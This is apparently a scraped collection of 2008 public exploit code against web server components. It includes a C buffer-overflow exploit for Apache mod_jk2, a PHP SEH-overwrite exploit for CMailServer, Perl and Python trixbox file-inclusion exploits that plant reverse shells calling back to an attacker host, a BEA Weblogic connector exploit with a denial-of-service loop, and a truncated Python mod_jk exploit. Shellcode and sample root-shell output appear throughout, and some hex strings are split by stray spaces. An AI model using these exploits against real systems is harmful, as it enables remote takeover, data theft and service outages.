"\x7b\x7b\x7b\x7b\xff\xd0\x7b\xad\xd9\x05\xce\x7b\x ff\xd6\x7b"
"\xff\xff\x37\xff\xd0\x8b\x7b\xfc\x83\xc4\x7b\xff\x d6\x7b\xff"
"\xd0\x7b\xf0\x8a\x04\x5f\x7b\xff\xd6\xff\xd0"
},
{NULL , NULL }
};
int main(int argc, char **argv)
{
char * remotehost=NULL;
char default_remotehost[]="127.0.0.1";
char temp1[100], temp2[100];
int port, itarget, x, sh;
SOCKET s;
char c;
int option_index=0;
logo();
WSADATA wsa;
WSAStartup(MAKEWORD(2,0), &wsa);
if(argc<2)
{
usage(argv[0]);
return -1;
}
// set defaults
port=80;
itarget=-1;
sh=0;
// ------------
while((c = getopt(argc, argv, "h:p:"))!= EOF)
{
switch (c)
{
case 'h':
remotehost=optarg;
break;
case 'p':
sscanf(optarg, "%d", &port);
break;
default:
usage(argv[0]);
WSACleanup();
return -1;
}
}
if(remotehost == NULL) remotehost=default_remotehost;
memset(temp1,0,sizeof(temp1));
memset(temp2,0,sizeof(temp2));
memset(temp1, '\x20' , 58 - strlen(remotehost) -1);
printf(" # Host : %s%s# \n", remotehost, temp1);
sprintf(temp2, "%d", port);
memset(temp1,0,sizeof(temp1));
memset(temp1, '\x20' , 58 - strlen(temp2) -1);
printf(" # Port : %s%s# \n", temp2, temp1);
memset(temp1,0,sizeof(temp1));
memset(temp2,0,sizeof(temp2));
sprintf(temp2, "%s", shellcodes[sh].name );
memset(temp1, '\x20' , 58 - strlen(temp2) -1);
printf(" # Payload : %s%s# \n", temp2, temp1);
printf(" # ------------------------------------------------------------------- # \n");
fflush(stdout);
printf(" [+] Checking if server is online\n");
fflush(stdout);
s=do_connect(remotehost, port);
if(s==-1)
{
printf(" [-] Server is OFFLINE\n");
end_logo();
return 0;
}
closesocket(s);
printf(" [+] Server is ONLINE\n");
x = get_version(remotehost, port, &itarget);
if(x<0)
{
printf(" [-] Cannot exploit due to errors\n");
WSACleanup();
end_logo();
return -1;
}
unsigned char buf[10000];
unsigned int len;
memset(buf,0,sizeof(buf));
fflush(stdout);
make_buffer(buf, &len, itarget, sh);
printf(" [+] Attacking buffer constructed\n");
if(send_buffer(buf, len, remotehost,port)==-1)
{
printf(" [-] Cannot exploit server %s\n", remotehost);
end_logo();
WSACleanup();
return -1;
}
printf(" [+] Buffer sent\n");
printf(" [+] Connect to %s:%d\n", remotehost, 9999);
end_logo();
WSACleanup();
return 0;
}
SOCKET do_connect (char *remotehost, int port)
{
static struct hostent *host;
static struct sockaddr_in addr;
SOCKET s;
host = gethostbyname(remotehost);
if (!host)
{
perror(" [-] gethostbyname() failed");
return -1;
}
addr.sin_addr = *(struct in_addr*)host->h_addr;
s = socket(PF_INET, SOCK_STREAM, 0);
if (s == -1)
{
closesocket(s);
perror("socket() failed");
return -1;
}
addr.sin_port = htons(port);
addr.sin_family = AF_INET;
if (connect(s, (struct sockaddr*)&addr, sizeof(addr)) == -1)
{
closesocket(s);
return -1;
}
return s;
}
int get_version(char * remotehost, int port, int * target)
{
char bufmax[4096], * lp, *lp2, WebBanner[1000], Version[1000], ModJK[1000];
int bytes,j,x;
SOCKET sock;
memset(bufmax,0,sizeof(bufmax));
memset(WebBanner,0,sizeof(WebBanner));
memset(Version,0,sizeof(Version));
memset(ModJK,0,sizeof(ModJK));
sock = do_connect(remotehost, port);
if (sock == -1) return -1;
send(sock, "GET /a.html HTTP/1.0\r\n\r\n",(int)strlen("GET /a.html HTTP/1.0\r\n\r\n"),0);
if ((bytes = recv(sock, bufmax, sizeof(bufmax),0 )) <= 0) return -1;
bufmax[sizeof(bufmax)-1]=0;
if((lp=strstr(bufmax,"Server:"))==NULL) return -1;
if((lp2=strstr(lp,"\r\n"))==NULL) return -1;
strncpy(WebBanner, lp, lp2-lp);
if((lp=strstr(WebBanner,"Win32"))==NULL)
{
printf(" [-] OS is not a Win32\n");
return -1;
}
if((lp=strstr(WebBanner,"Apache/"))==NULL)
{
printf(" [-] No Apache\n");
return -1;
}
if(lp+strlen("Apache/")>WebBanner+strlen(WebBanner)-1) return -1;
lp+=strlen("Apache/");
if((lp2=strstr(lp," "))==NULL) return -1;
strncpy(Version, lp, lp2-lp);
printf(" [+] Version of Apache is %s\n", Version);
x=0;
for(j=0; targets[j].t!=0;j++)
{
if(strstr(targets[j].t,Version)!=NULL)
{
x=1;
break;
}
}
if(x==0)
{
printf(" [-] This version of Apache is UNSUPPORTED\n");
return -1;
}
printf(" [+] This version of Apache is SUPPORTED\n");
strncpy(WebBanner, lp, lp2-lp);
if((lp=strstr(WebBanner,"mod_jk2/"))==NULL)
{
printf(" [-] No mod_jk2\n");
return -1;
}
if((lp2=strstr(lp," "))==NULL) lp2=WebBanner+strlen(WebBanner);
strncpy(ModJK, lp, lp2-lp);
printf(" [+] mod_jk2 is %s\n", ModJK);
x=0;
for(j=0; targets[j].t!=0;j++)
{
if(strstr(targets[j].t,ModJK)!=NULL)
{
*target=j;
x=1;
break;
}
}
if(x==0)
{
printf(" [-] This version of mod_jk2 is UNSUPPORTED\n");
return -1;
}
printf(" [+] This version of mod_jk2 is SUPPORTED\n");
return 0;
}
void prepare_shellcode(unsigned char * fsh, unsigned int * fshlength, int sh)
{
memcpy(fsh, shellcodes[sh].shellcode, shellcodes[sh].length);
*fshlength = shellcodes[sh].length;
}
void make_buffer(unsigned char * buf, unsigned int * len, int itarget, int sh)
{
// prepare shellcode
unsigned char fsh[10000];
unsigned int fshlength;
memset(fsh, 0, sizeof(fsh));
prepare_shellcode(fsh, &fshlength, sh);
// -----------------
// make buffer
unsigned char * cp=buf;
// begin of the HTTP request
memcpy(cp, "GET / HTTP/1.0\r\nHost: ", strlen("GET / HTTP/1.0\r\nHost: ") );
cp+=strlen((char *)cp);
// jff
*cp++='\x90';
*cp++='\x90';
*cp++='\x90';
*cp++='\x90';
// overflowing
memset(cp, '\x41', 5001);
// put the shellcode
memcpy(cp, fsh, fshlength);
cp+=1271;
// calculating backward jump
int jmp_bytes=0xffffffff - (1275);
// putting backward jump
*cp++ = '\xe9';
*cp++ = (char)((jmp_bytes ) & 0xff);
*cp++ = (char)((jmp_bytes >> 8) & 0xff);
*cp++ = (char)((jmp_bytes >> 16) & 0xff);
*cp++ = (char)((jmp_bytes >> 24) & 0xff);
// next SEH record and back jump
*cp++='\x90';
*cp++='\x90';
*cp++='\xeb';
*cp++='\xf7';
// replace SEH
*cp++ = (char)((targets[itarget].ret ) & 0xff);
*cp++ = (char)((targets[itarget].ret >> 8) & 0xff);
*cp++ = (char)((targets[itarget].ret >> 16) & 0xff);
*cp++ = (char)((targets[itarget].ret >> 24) & 0xff);
// trigger exception
cp+=3000;
// copy the last part of the request
memcpy(cp, "\r\n\r\n", strlen("\r\n\r\n") );
cp+=strlen((char *)cp);
}
int send_buffer(unsigned char * buf, unsigned int len, char * remotehost, int port)
{
SOCKET sock;
sock = do_connect(remotehost, port);
if (sock<0) return -1;
if (send(sock, (char *)buf,(int)strlen((char *)buf),0)<=0) return -1;
closesocket(sock);
return 1;
}
// -----------------------------------------------------------------
// XGetopt.cpp Version 1.2
// -----------------------------------------------------------------
int getopt(int argc, char *argv[], char *optstring)
{
static char *next = NULL;
if (optind == 0)
next = NULL;
optarg = NULL;
if (next == NULL || *next == '\0')
{
if (optind == 0)
optind++;
if (optind >= argc || argv[optind][0] != '-' || argv[optind][1] == '\0')
{
optarg = NULL;
if (optind < argc)
optarg = argv[optind];
return EOF;
}
if (strcmp(argv[optind], "--") == 0)
{
optind++;
optarg = NULL;
if (optind < argc)
optarg = argv[optind];
return EOF;
}
next = argv[optind];
next++; // skip past -
optind++;
}
char c = *next++;
char *cp = strchr(optstring, c);
if (cp == NULL || c == ':')
return '?';
cp++;
if (*cp == ':')
{
if (*next != '\0')
{
optarg = next;
next = NULL;
}
else if (optind < argc)
{
optarg = argv[optind];
optind++;
}
else
{
return '?';
}
}
return c;
}
// -----------------------------------------------------------------
// -----------------------------------------------------------------
// -----------------------------------------------------------------
void usage(char * s)
{
printf("\n");
printf(" Usage: %s -h <host> -p <port>\n", s);
printf(" -------------------------------------------------------------------\n");
printf(" Arguments:\n");
printf(" -h ........ host to attack\n");
printf(" -p ........ port to use\n");
printf("\n");
printf(" Supported mod_jk versions:\n");
for(int j=0; targets[j].t!=0;j++)
{
printf(" %d. %s\n",j+1, targets[j].t);
}
printf("\n");
printf(" Execution: %s\n\n", shellcodes[0].name);
end_logo();
}
void logo()
{
printf("\n\n");
printf(" ################################################## ##################### \n");
printf(" # ____ __ _ ______ __ _____ #\n");
printf(" # / __ \\________ _____/ /_(_)_________ / __/\\ \\/ / / _ / #\n");
printf(" # / / / / ___/ _ \\/ __ / __/ / ___/ __ / ___ / / \\ / / // / #\n");
printf(" # / /_/ / / / ___/ /_// /_/ / /__/ /_// /__/ / _/ / \\ / ___/ #\n");
printf(" # /_____/_/ \\___/ \\_,_/\\__/_/\\___/\\__,_/ /_/ /_/\\_\\/_/ #\n");
printf(" # crew #\n");
printf(" ################################################## ##################### \n");
printf(" # Exploit : mod_jk2 v2.0.2 for Apache 2.0 # \n");
printf(" # Author : Heretic2 # \n");
printf(" # THANKS : IOActive and The Metasploit Project # \n");
printf(" # Research: IOActive Security Advisory # \n");
printf(" # Version : 1.0 # \n");
printf(" # System : Windows ALL # \n");
printf(" # Date : 01.03.2008 - 02.03.2008 # \n");
printf(" # ------------------------------------------------------------------- # \n");
}
void end_logo()
{
printf(" # ------------------------------------------------------------------- # \n");
printf(" # Dreatica-FXP crew [Heretic2] # \n");
printf(" ################################################## ##################### \n\n");
}
// [2008-03-31]
80 Apache Tomcat Connector jk2-2.0.2 (mod_jk2) Remote Overflow Exploit
/*
**
** Fedora Core 6,7,8 (exec-shield) based
** Apache Tomcat Connector jk2-2.0.2(mod_jk2) remote overflow exploit
** by INetCop Security
**
** Advanced exploitation in exec-shield (Fedora Core case study)
** URL: http://www.enigmagroup.org/papers/151
**
** IOActive Security Advisory:
** http://www.securityfocus.com/archive/1/487983
**
** Heretic2([email protected])'s exploit (Win32):
** http://www.enigmagroup.org/exploits/5330
**
** --
** exploit by INetCop Security.
*/
/*
** --
** $ ./0x82-apache-mod_jk2 61.xx.xx.20 80 61.xx.xx.30
**
** Fedora Core release 6 (exec-shield) based
** Apache Tomcat Connector (mod_jk2) remote overflow exploit
** Target Version: Apache/2.0.53 (Unix) mod_jk2/2.0.2
** by INetCop Security
**
** + make socket
** + make exploit payload
** + try connected 61.42.25.22:80
** + exploit send!
** * attacker host, check it up, now! :-D
**
** $
** --
**
** attacker's server port 56789: --
** $ nc -l -p 56789 -vv
** listening on [any] 56789 ...
** 61.xx.xx.20: inverse host lookup failed: Unknown host
** connect to [61.xx.xx.30] from (UNKNOWN) [61.xx.xx.20] 47576
** id
** --
**
** attacker's server port 5678: --
** $ nc -l -p 5678 -vv
** listening on [any] 5678 ...
** 61.xx.xx.20: inverse host lookup failed: Unknown host
** connect to [61.xx.xx.30] from (UNKNOWN) [61.xx.xx.20] 52452
** uid=99(nobody) gid=4294967295 groups=4294967295 context=root:system_r:unconfined_t:s0-s0:c0.c1023
** --
**
*/
http://enigmagroup.org/sploits/2008-x2_fc6f7f8.tar.gz
# [2008-04-06]
80 CMailServer 5.4.6 (CMailCOM.dll) Remote SEH Overwrite Exploit
<?php
/*
CMailServer 5.4.6 mvmail.asp/CMailCOM.dll remote seh overwrite
proof of concept exploit
by Nine:Situations:Group::bruiser
our site: http://retrogod.altervista.org/
software site: http://www.youngzsoft.net/cmailserver/
Google dorks:
intitle:"Mail Server CMailServer WebMail"
intitle:"Mail Server CMailServer WebMail 5.4.6"
Some notes:
This server provides a IIS/webmail interface and a registered component
vulnerable to multiple buffer overflows, among the others, the
CMailCom.POP3 class with CLSID 6971D9B8-B53E-4C25-A414-76199768A592.
This class is called by various ASP scripts inside the main folder...
I found this clear vector, look mwmail.asp , lines 25-35:
...
Set objPOP3 = CreateObject("CMailCOM.POP3.1")
objPOP3.Login Session("User"), Session("Pass")
Session("LoginSuccess") = objPOP3.LoginSuccess
If Session("LoginSuccess") = 1 Then
set rs=Server.createobject("adodb.recordset")
rs.open "mailfolder",Conn,1,3
i = 0
arrString = Split(Request("indexOfMail"), ";", -1, 1)
While Len(arrString(i)) <> 0
strUID = arrString(i)
objPOP3.MoveToFolder strUID ' <---------------- bof
...
By attaching olly to the w3wp.exe sub-process you will see the usual
dump with ecx and eip owned, with a buffer of approxymately 13000 chars.
Exploitation is post-auth but you can have a user account by simply
browsing the signup.asp page, enabled by default.
Calc.exe will run with NETWORK SERVICE privilege, check tasks. Note
that 4-5 failed exploit attempts may result in IIS "Service
Unavailiable" message.
Other attacks are possible, see a list of locally overflowable
methods:
CreateUserPath, Logout, DeleteMailByUID, MoveToInbox, MoveToFolder,
DeleteMailEx, GetMailDataEx, SetReplySign, SetForwardSign, SetReadSign.
Note also that remotely there's some kind of validation (ex. you can
not have a username with a length of more than 4000 chars which
could be used instead to overflow the CreateUserPath method and
you cannot overflow ex. through the strUID argument) which reduces a lot
the remote vectors. However, as you can see there's no filter on
"indexOfMail" one.
Other notes:
CMailCOM.SMTP class with CLSID 0609792F-AB56-4CB6-8909-19CDF72CB2A0
is also vulnerable in the following methods:
AddAttach, SetSubject, SetBcc, SetBody, SetCc, SetFrom,
SetTo, SetFromUID
*/
error_reporting(7);$host=$argv[1];$path=$argv[2];
$argv[3] ? $port = (int) $argv[3] : $port = 80;
print ("CMailServer 5.4.6 mvmail.asp/CMailCOM.dll remote seh overwrite\n".
"exploit\n".
"by Nine:Situations:Group::bookoo\n");
$argv[2] ? print("attackin'...\n") : die ("syntax: php ".$argv[0]." [host] [path] [[port]]\n".
"example: php ".$argv[0]." 192.168.0.1 /mail/ \n".
" '' php ".$argv[0]." 192.168.0.1 / 81 \n");
$url = "http://$host:$port";
$win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false;
$win ? dl("php_curl.dll") : dl("php_curl.so");
//borrowed from bookoo
function send($packet,$out) {
global $url, $data;
if (!extension_loaded("curl"){
die("you need the curl extesion loaded to run...");
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $packet);
$data = curl_exec($ch); if (curl_errno($ch)) {
print curl_error($ch)."\n";
} else {
curl_close($ch);
}
if ($out) print($data."\n");
}
$agent="Mozilla/5.0 (Windows; U; Windows NT 5.2; it; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15";
//subscribe
$usr="bookoo";$pwd="password";//new usr username & password, change
$d ="Signup=1&Account=$usr&Pass=$pwd&RePass=$pwd&UserName=&Comment=User&POP3Mail=%40ieqowieoqw.com";
$h ="POST ".$path."signup.asp HTTP/1.0\r\nHost: $host\r\nUser-Agent: $agent\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: ".strlen($d)."\r\nConnection: Close\r\n\r\n$d";
send($h,0);
$tmp=explode("Set-Cookie: ",$data);
for ($i=1; $i<count($tmp);$i++){ $tmpi=explode(" ",$tmp[$i]);$sess=$tmpi[0];$pos=strpos($sess, "ASPSESSIONID"); if ($pos === true) break; echo $sess."\n";}
//login
$d ="User=$usr&Pass=$pwd&SaveUserPass=on";
$h ="POST ".$path."login.asp HTTP/1.0\r\nHost: $host\r\nUser-Agent: $agent\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: ".strlen($d)."\r\nCookie: $sess SaveUserPass=1; Pass=$pwd; User=$usr;\r\nConnection: Close\r\n\r\n$d";
send($h,0);
//attack
//bad chars: \x3b \x2f
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=Pex http://metasploit.com
$shellcode =
"\x2b\xc9\x83\xe9\xde\xe8\xff\xff\xff\xff\xc0\x5e\x 81\x76\x0e\xcf".
"\x67\x5f\x11\x83\xee\xfc\xe2\xf4\x33\x8f\x1b\x11\x cf\x67\xd4\x54".
"\xf3\xec\x23\x14\xb7\x66\xb0\x9a\x80\x7f\xd4\x4e\x ef\x66\xb4\x58".
"\x44\x53\xd4\x10\x21\x56\x9f\x88\x63\xe3\x9f\x65\x c8\xa6\x95\x1c".
"\xce\xa5\xb4\xe5\xf4\x33\x7b\x15\xba\x82\xd4\x4e\x eb\x66\xb4\x77".
"\x44\x6b\x14\x9a\x90\x7b\x5e\xfa\x44\x7b\xd4\x10\x 24\xee\x03\x35".
"\xcb\xa4\x6e\xd1\xab\xec\x1f\x21\x4a\xa7\x27\x1d\x 44\x27\x53\x9a".
"\xbf\x7b\xf2\x9a\xa7\x6f\xb4\x18\x44\xe7\xef\x11\x cf\x67\xd4\x79".
"\xf3\x38\x6e\xe7\xaf\x31\xd6\xe9\x4c\xa7\x24\x41\x a7\x97\xd5\x15".
"\x90\x0f\xc7\xef\x45\x69\x08\xee\x28\x04\x3e\x7d\x ac\x67\x5f\x11";
$jmp_short="\xeb\x10\x90\x90";
$seh="\xf1\xda\x02\x10"; #0x1002DAF1 cmailcom.dll / pop ecx - pop - ret
$nop=str_repeat("\x90",12648);
$bof= $nop . $jmp_short. $seh . str_repeat("\x90",24). $shellcode ;
$d="sel=aaaa&ToFolder=4&indexOfMail=".urlencode($bof)."&mailcount=1&pages=";
$h ="POST ".$path."mvmail.asp HTTP/1.0\r\nHost: $host\r\nUser-Agent: $agent\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: ".strlen($d)."\r\nCookie: $sess SaveUserPass=1; Pass=$pwd; User=$usr;\r\nConnection: Close\r\n\r\n$d";
send($h,1);
?>
# [2008-07-06]
80 trixbox (langChoice) Local File Inclusion Exploit (connect-back) v2
#!/usr/bin/perl -w
# Jean-Michel BESNARD <[email protected]> / LEXSI Audit
# 2008-07-09
# This is an update of the previous exploit. We can now get a root shell, thanks to sudo.
#
# perl trixbox_fi_v2.pl 192.168.1.212
# Please listen carefully as our menu option has changed
# Choose from the following options:
# 1> Remote TCP shell
# 2> Read local file
# 1
# Host and port the reverse shell should connect to ? (<host>:<port>): 192.168.1.132:4444
# Which uid would you like for your shell ? (uid=root will be OK on most recent trixbox versions only): [root|asterisk]
# root
# Make sure you've opened a server socket on port 4444 at 192.168.1.132 (e.g, nc -l -p 4444)
# Press enter to continue...
# done...
# nc -l -v -p 4444
# listening on [any] 4444 ...
# connect to [192.168.1.132] from lexsi-abo-new.lexsi.com [192.168.1.212] 48397
# bash: no job control in this shell
# bash-3.1# id
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(di sk),10(wheel)
# bash-3.1#
use strict;
use Switch;
use LWP::UserAgent;
use HTTP::Cookies;
usage() unless @ARGV;
my $url = "http://$ARGV[0]/user/index.php";
my $ua = LWP::UserAgent->new;
my $cookie_jar = HTTP::Cookies->new;
$ua->cookie_jar($cookie_jar);
menu();
sub execScript{
my $scriptCode = shift;
post($scriptCode);
my $phpsessionid = extractPHPSID($cookie_jar->as_string);
post("langChoice=../../../../../../../../../../tmp/sess_$phpsessionid%00");
}
sub post{
my $postData = shift;
my $req = HTTP::Request->new(POST => $url);
$req->content_type('application/x-www-form-urlencoded');
$req->content($postData);
my $res = $ua->request($req);
my $content = $res->content;
return $content;
}
sub readFile{
my $file = shift;
my $content = post("langChoice=../../../../../../../../../..$file%00");
my @fileLines = split(/\n/,$content);
my $fileContent = "Content of $file: \n\n";
for(my $i=3;$i<@fileLines;$i++){
last if($fileLines[$i] =~ m/trixbox - User Mode/);
$fileContent = $fileContent . $fileLines[$i-3] . "\n";
}
return $fileContent;
}
sub tcp_reverse_shell{
my $rhost= shift;
my $rport = shift;
my $uid = shift;
my $rshell;
if($uid eq "asterisk"){
$rshell = "langChoice=<?php `/usr/bin/perl -MSocket -e '\\\$p=fork;exit,if(\\\$p);socket(S, PF_INET, SOCK_STREAM, getprotobyname('tcp'));connect(S, sockaddr_in($rport,inet_aton(\"$rhost\")));open(STDIN, \">%26S\");open(STDOUT,\">%26S\");open(STDERR,\">%26S\");exec({\"/bin/sh\"} (\"JMB\", \"-i\"));'`;?>%00";
}else{
$rshell = "langChoice=<?php `/usr/bin/perl -MSocket -e '\\\$p=fork;exit,if(\\\$p);socket(S, PF_INET, SOCK_STREAM, getprotobyname('tcp'));connect(S, sockaddr_in($rport,inet_aton(\"$rhost\")));open(STDIN, \">%26S\");open(STDOUT,\">%26S\");open(STDERR,\">%26S\");exec(\"/usr/bin/sudo\",\"/bin/bash\", (\"-i\"));'`;?>%00";
}
execScript($rshell);
}
sub extractPHPSID{
$_ = shift;
if(/PHPSESSID=(\w+)/){
return $1;
}
}
sub menu{
print <<EOF;
Please listen carefully as our menu option has changed
Choose from the following options:
1> Remote TCP shell
2> Read local file
EOF
my $option = <STDIN>;
chop($option);
switch($option){
case 1 {
print "Host and port the reverse shell should connect to ? ";
print "(<host>:<port>): ";
my $hp=<STDIN>;
chop($hp);
print "Which uid would you like for your shell ? (uid=root will be OK on most recent trixbox versions only): [root|asterisk]";
my $uid=<STDIN>;
chop($uid);
my($rhost,$rport) = split(/:/,$hp);
print "Make sure you've opened a server socket on port $rport at $rhost (e.g, nc -l -p $rport)\n";
print "Press enter to continue...";
<STDIN>;
tcp_reverse_shell($rhost,$rport,$uid);
print "done...\n";
}
case 2 {
while(1){
print "Full path (e.g. /etc/passwd): ";
my $file = <STDIN>;
chop($file);
print readFile($file) . "\n\n";
}
}
}
}
sub usage{
print "./trixbox_fi.pl <host>\n";
exit 1;
}
# [2008-07-09 ]
80 trixbox 2.6.1 (langChoice) Remote Root Exploit (py)
#!/usr/bin/python
# TrixBox 2.6.1 langChoice remote root exploit
# muts from offensive-security.com
# chris from offensive-security.com
# All credits to Jean-Michel BESNARD <[email protected]>
# Same same, but different.
# http://www.offensive-security.com/0day/trixbox.py.txt
################################################## ################################################
# id
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(di sk),10(wheel)
# uname -a
# Linux trixbox1.localdomain 2.6.25.7 #4 SMP Tue Jun 17 19:35:11 EDT 2008 i686 i686 i386 GNU/Linux
################################################## ################################################
import sys
from socket import *
import re
import os
from time import sleep
print (" BY THE POWER OF GRAYSKULL - I HAVE THE ROOTZ0R!\r\n"
" TrixBox 2.6.1 langChoice remote root exploit \r\n"
" http://www.offensive-security.com/0day/trixbox.py.txt\r\n")
if (len(sys.argv)!=5):
print " Usage: %s <rhost> <rport> <lhost> <lport>" % sys.argv[0]
exit(0)
host=sys.argv[1]
port=int(sys.argv[2])
lhost=sys.argv[3]
lport=int(sys.argv[4])
def create_post(injection):
buffer=("POST /user/index.php HTTP/1.1 \r\n"
"Host: 192.168.219.132 \r\n"
"Content-Type: application/x-www-form-urlencoded \r\n"
"Content-Length: "+str(len(injection))+"\r\n\r\n" +injection)
return buffer
def send_post(host,port,input):
s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
s.send(input)
output=s.recv(1024)
s.close()
return output
def find_sessionid(http_output):
headers=re.split("\n",http_output)
for header in headers:
if re.search("Set-Cookie",header):
cook=header.split(" ")
sessionid=cook[1][10:42]
print " Session ID is %s" % sessionid
return sessionid
print " Injecting reverse shell into session file"
bash_inject="langChoice=<?php shell_exec(\"sudo /bin/bash 0</dev/tcp/"+lhost+"/"+str(lport)+" 1>%260 2>%260\");?>"
reverse=create_post(bash_inject)
raw_session=send_post(host,port,reverse)
print " Extracting Session ID"
id=find_sessionid(raw_session)
print " Triggering Reverse Shell to %s %d in 3 seconds" % (lhost,lport)
sleep(3)
print " Skadush! \r\n Ctrl+C to exit reverse shell."
tmpsession=create_post('langChoice=../../../../../../../../../../tmp/sess_'+id+'%00')
send_post(host,port,tmpsession)
print " Cleaning up"
cleanup=create_post('langChoice=english')
send_post(host,port,cleanup)
send_post(host,port,cleanup)
print " Done!"
# [2008-07-12]
80 Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit
#// Bea Weblogic -- Apache Connector Remote Exploit +-1day
#// Should stack break latest Windows Server 2003 <address space randomization>
#// BIG THANKS TO
#// "dong-hun you"(Xpl017Elz) in INetCop - for his paper
#// "Title: Advanced exploitation in exec-shield (Fedora Core case study)"
#// His technique works fine against Windows 2003 latest version.
#//
#// The code is broken, since I am chilling out for now
#// SKIDDI BULLETPROOF
#// You may fixup the DoS Code, Windows Code Works on English OSs
#// KingCope -- July/2008
use IO::Socket;
use strict;
$|=1;
my $apacheport = 80; #// Touch
###
my $wrongusage = 0;
my $dodoshost = 0;
################################################## #############################
### Target List Entries |Operating System and Patch Level / Kernel Version|
################################################## #############################
my @targets = ();
my @tgtname = ();
print "-" x 80;
$targets[0] = "1 Windows Server 2003 Enterprise Edition SP2 RC1 -- English\n";
$tgtname[0] = $targets[0];
$targets[100] = "2 Denial of Service\n";
$tgtname[100] = $targets[100];
################################################## #############################
### Print Of Target List And Usage
################################################## #############################
print "\n";
print "Bea Weblogic -- Apache Connector Remote Exploit\n\n";
print "Target List:\n";
foreach my $target (@targets) {
print $target;
}
print "\n\n";
print "-" x 80;
print "Usage: perl bea-unlock.pl <hostname or ip> <target>";
print "\n";
printusage:
if ($wrongusage == 1) { exit; }
################################################## ##############################
### Argument Parsing
################################################## ##############################
my $host = $ARGV[0];
my $target = $ARGV[1];
if (($host == "") || ($target == "")) {
$wrongusage = 1;
goto printusage;
}
################################################## ##############################
### Setup Socket
################################################## ##############################
setupsocket:
my $sock = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => $apacheport,
Proto => 'tcp');
if ($dodoshost == 1) {
goto doshost;
}
################################################## ##############################
### Select Target
################################################## ##############################
if ($target == 1) {
print "Exploiting $host -- " . $tgtname[$target-1];
goto winexpl;
}
if ($target == 2) {
print "Attacking Host $host -- Denial of Service -- Wait ...\n";
goto doshost;
}
################################################## ##############################
### Exploitation of Windows Versions
################################################## ##############################
winexpl:
####WORKS [LOOKUP THE HOSTNAME]
my $command = "echo works > c:\\desiredfile.txt";
my $cmds = "cmd.exe /c \"$command\"|";
my $sc = $cmds;
#### STACKBREAKING WITH WINEXEC() ON WINDOWS
my $c = "C" x 97 . pack("L", 0x10013930) x 3 . pack("L", 0x10013930) . pack("L", 0x10013931) . pack("L",0x77EA411E);
my $a = $cmds . "A" x (4000-length($cmds)) . $c;
print $sock "POST /.jsp $a\r\nHost: localhost\r\n\r\n";
while (<$sock>) {
print;
}
################################################## ##############################
### Denial of Service Against The Apache Frontend Module For Bea Weblogic
################################################## ##############################
####NEEDS SOME FIXUP
doshost:
$dodoshost = 1;
while(1) {
$a = "A" x 6000;
goto setupsocket;
print $sock "POST /.jsp $a\r\n\r\nHost: localhost\r\n\r\n";
while(read($sock,$_,100)) {
my $dosagain = 0;
if ($dosagain eq 1) {
"Server is down now\n";
exit;
}
if ($_ =~ /Server/) {
print ".";
$dosagain = 1;
next;
}
}
}
# [2008-07-17]
80 Apache mod_jk 1.2.19 Remote Buffer Overflow Exploit (win32)
#!/usr/bin/python
#
# _____ _ _ _____ _____ _____ _____
# / ___| |_| | _ \| _ | _ |_ _|
# | (___| _ | [_)_/| (_) | (_) | | |
# \_____|_| |_|_| |_||_____|_____| |_|
# C. H. R. O. O. T. SECURITY GROUP
# - -- ----- --- -- -- ---- --- -- -
# http://www.chroot.org
#
# _ _ _ _____ ____ ____ __ _
# Hacks In Taiwan | |_| | |_ _| __| | \| |
# Conference 2008 | _ | | | | | (__| () | |
# |_| |_|_| |_| \____|____|_|\__|
# http://www.hitcon.org
#
#
# Title =======:: Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit
#
# Author ======:: unohope [at] chroot [dot] org
#
# IRC =========:: irc.chroot.org #chroot
#
# ScriptName ==:: Apache Module mod_jk/1.2.19
#
# Vendor ======:: http://tomcat.apache.org/
#
# Download ====:: http://archive.apache.org/dist/tomcat/tomcat-connectors/jk/binaries/win32/
#
# Tested on ===:: Apache/2.0.58 (Win32) mod_jk/1.2.19
# Apache/2.0.59 (Win32) mod_jk/1.2.19
#
# Greets ======:: zha0
#
#
# [root@wargame tmp]# ./apx-jk_mod-1.2.19
# Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit ([email protected])
#
# usage: ./apx-jk_mod-1.2.19 <host>
#
# [root@wargame tmp]# ./apx-jk_mod-1.2.19 192.168.1.78
# Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit ([email protected])
#
# [+] connecting to 192.168.1.78 ...
#
# Trying 192.168.1.78...
# Connected to 192.168.1.78.
# Escape character is '^]'.
# Microsoft Windows XP [.. 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\AppServ\Apache2>
#
#
import os, sys, time
from socket import *
shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x 49\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x 51\x5a\x6a\x68"
shellcode += "\x58\x30\x41\x31\x50\x42\x41\x6b\x42\x41\x78\x42\x 32\x42\x41\x32"
shellcode += "\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4b\x 59\x49\x6c\x43"
shellcode += "\x5a\x7a\x4b\x32\x6d\x5a\x48\x5a\x59\x69\x6f\x4b\x 4f\x39\x6f\x71"
shellcode += "\x70\x6e\x6b\x62\x4c\x44\x64\x71\x34\x4c\x4b\x62\x 65\x75\x6c\x4c"
shellcode += "\x4b\x63\x4c\x76\x65\x70\x78\x35\x51\x48\x6f\x6c\x 4b\x50\x4f\x74"
